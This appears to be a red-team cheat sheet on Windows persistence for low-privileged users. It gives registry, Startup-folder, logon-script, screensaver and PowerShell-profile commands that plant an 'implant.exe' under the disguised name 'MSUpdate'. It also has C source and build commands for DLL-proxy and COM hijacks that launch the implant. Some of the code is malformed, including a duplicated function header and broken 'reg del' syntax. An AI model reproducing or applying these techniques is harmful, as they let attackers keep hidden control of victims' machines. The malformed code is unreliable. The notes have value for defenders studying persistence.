Low Priv User

Persistence techniques for low privileged user

Startup folder:

cp implant.exe C:\Users\USER\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup

Reg keys:

UserInitMprLogonScript:

Currently Stealthy?

# add
reg add "HKEY_CURRENT_USER\Environment" /v MSUpdate /t REG_SZ /d "C:\Windows\Tasks\implant.exe" /f
# del
reg del "HKEY_CURRENT_USER\Environment" /v MSUpdate /t REG_SZ /d "C:\Windows\Tasks\implant.exe" /f

CurrentVersion Run:

# add
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d C:\Windows\Tasks\implant.exe" /f
# del
reg del "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d C:\Windows\Tasks\implant.exe" /f

LogonScripts:

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /d "C:\Windows\Tasks\implant.bat" /t REG_SZ /f

# logon script
echo "
ECHO OFF
C:\Windows\Tasks\implant.exe
" > C:\Windows\Tasks\implant.bat

Screensaver:

# add screensave implant
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.exe" /t REG_SZ /d "C:\Users\USER\implant.exe"
# set timeout
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f

Powershell Profiles:

if C:\Users\USERNAME\Documents\WindowsPowershell exists, you can create a profile script that will execute the payload:

echo "C:\Windows\Tasks\implant.exe" > C:\Users\USERNAME\Documents\WindowsPowershell\implant.ps1 

DLL Hijacking/Proxying:

identify a candidate; either a service or scheduled task that runs, could also be within the \RUN reg key. Download the executable home folder and execute to get the DLL that are executed.

check icacls within the directory to check if you can modify the path, presented as a (M)

Look for a DLL that doesn't exist in your local path, can use procmon then filter based on 'result CONTAINS "NOT FOUND"' and 'Process Name CONTAINS "Application_Name"'.

Additionally, use 'dumpbin /exports original.dll' to see what is called and what libraries they include. The pragma comment needs to be performed for all the calls to ensure the app works properly.

Create DLL:

// Add a linker to the original DLL:
    // the first, is for OpenPrinterA which is called using HEX 8F (143 decimal) goes after the @
    // decimal can be translated in python "python -c print(int(0x8f), int(0x4d), int(0x1d))"
    // update the linker to all calls
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@143")
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@79")
#pragma comment(linker,"/export:DLL_CALL_HERE=winsplhlp.DLL_CALL_HERE,@29")

// if the call doesn't have a function, (i.e. NONAME) use the #100 (100 = the ordinal name)
#pragma comment(linker,"/export:NONAME=winsplhlp.#100,@100,NONAME")

#include <Windows.h>

void Go(void) {
    STARTUPINFO info={sizeof(info)};
    PROCESS_INFORMATION processInfo;
        CreateProcess(
					"c:\\Windows\\Tasks \\implant.exe", 
					"", NULL, NULL, TRUE, 0, NULL, NULL, 
					&info, &processInfo);
}

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call)  {
    case DLL_PROCESS_ATTACH:
		Go();
		break;
    case DLL_THREAD_ATTACH:
		break;
    case DLL_THREAD_DETACH:
		break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

compile it using the following:

cl.exe /W0 /D_USRDLL /D_WINDLL winspool.cpp /MT /link /DLL /OUT:winspool.drv

copy the new dll and the original DLL and rename is to 'winsplhlp.dll' then place within the application folder.

COM-Based hijacking/proxying:

com objects referenced by GUIDs and can live on remote machine. When an app calls functions to a dll, calls SCM for the guid, queries local (machine and user) registry (HKEY_CLASSES_ROOT -> \SOFTWARE\CLASSES\CLSID). If found, loads the DLL. Can edit the \Software\CLASSES hive under user.

Can also be implemented as EXE files (process loading), still looks at the reg, tags the EXE starts a new process and the com-object lives in that process. called via RPC

If a remote machine, will be called SCM as remote, same as RPC

check scheduled tasks:

schtasks.exe /query /xml > tasks.xml

within the <Actions></Actions> sections, look for <ComHandler></ComHandler> and within the <Triggers></Triggers> look for persistence mechanisms i.e. logon. Once you have identified, query the CSID:

reg query "HKCR\CLSID\{123123123-1231-2123-1231-2312312312}"
reg query "HKCR\CLSID\{123123123-1231-2123-1231-2312312312}\service" 
# or could be in local machine:
reg query "HKLM\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service"
# or could be in current user: 
reg query "HKCU\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service"

# export: 
reg export "HKCU\Software\Classes\CLSID\{123123123-1231-2123-1231-2312312312}\Service" C:\Windows\Temp

Create the CPP file:

#include <Windows.h>
#include <combaseapi.h>

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  ul_reason_for_call, LPVOID lpReserved) {
    STARTUPINFO info={sizeof(info)};
    PROCESS_INFORMATION processInfo;

    switch (ul_reason_for_call)  {
    case DLL_PROCESS_ATTACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;    
	case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

HRESULT STDAPI DllGetClassObject(__in REFCLSID rclsid,
								__in REFIID riid,
								__deref_out LPVOID FAR* ppv) { 
	STARTUPINFO info={sizeof(info)};
        PROCESS_INFORMATION processInfo;
	typedef HRESULT(WINAPI * tDllGetClassObject)(REFCLSID rclsid, REFIID riid, LPVOID* ppv);
tDllGetClassObject pDllGetClassObject;

HRESULT STDAPI DllGetClassObject(REFCLSID rclsid,
								 REFIID riid,
								 LPVOID FAR* ppv) { 
	STARTUPINFO info={sizeof(info)};
    PROCESS_INFORMATION processInfo;
	HMODULE hOrigDLL;
	
	/* load the implant */
	CreateProcess(
				"c:\\Windows\\Tasks\\implant.exe", 
				"", NULL, NULL, TRUE, 0, NULL, NULL, 
				&info, &processInfo);
	
	/* load the original DLL */
	hOrigDLL = LoadLibrary("C:\\Windows\\System32\\WorkFoldersShell.dll");
	pDllGetClassObject = (tDllGetClassObject) GetProcAddress(hOrigDLL, "DllGetClassObject");
	if (!pDllGetClassObject)
		return S_FALSE;
	
	HRESULT hRes = pDllGetClassObject(rclsid, riid, ppv);
	
	return hRes;
} 

Create the DEF file:

LIBRARY
EXPORTS
  DllGetClassObject PRIVATE

Compile:

cl.exe /W0 /D_USRDLL /D_WINDLL WorkFoldersShell.cpp WorkFoldersShell.def /MT /link /DLL /OUT:WrkFoldersShell.dll

Update the exported registry to reflect the area where you want to store the new file. i.e. instead of 'HKEY_LOCAL_MACHINE' change to 'HKEY_CURRENT_USER'. also update the path of the DLL/EXE and save the file, then upload:

reg import task.reg /reg:64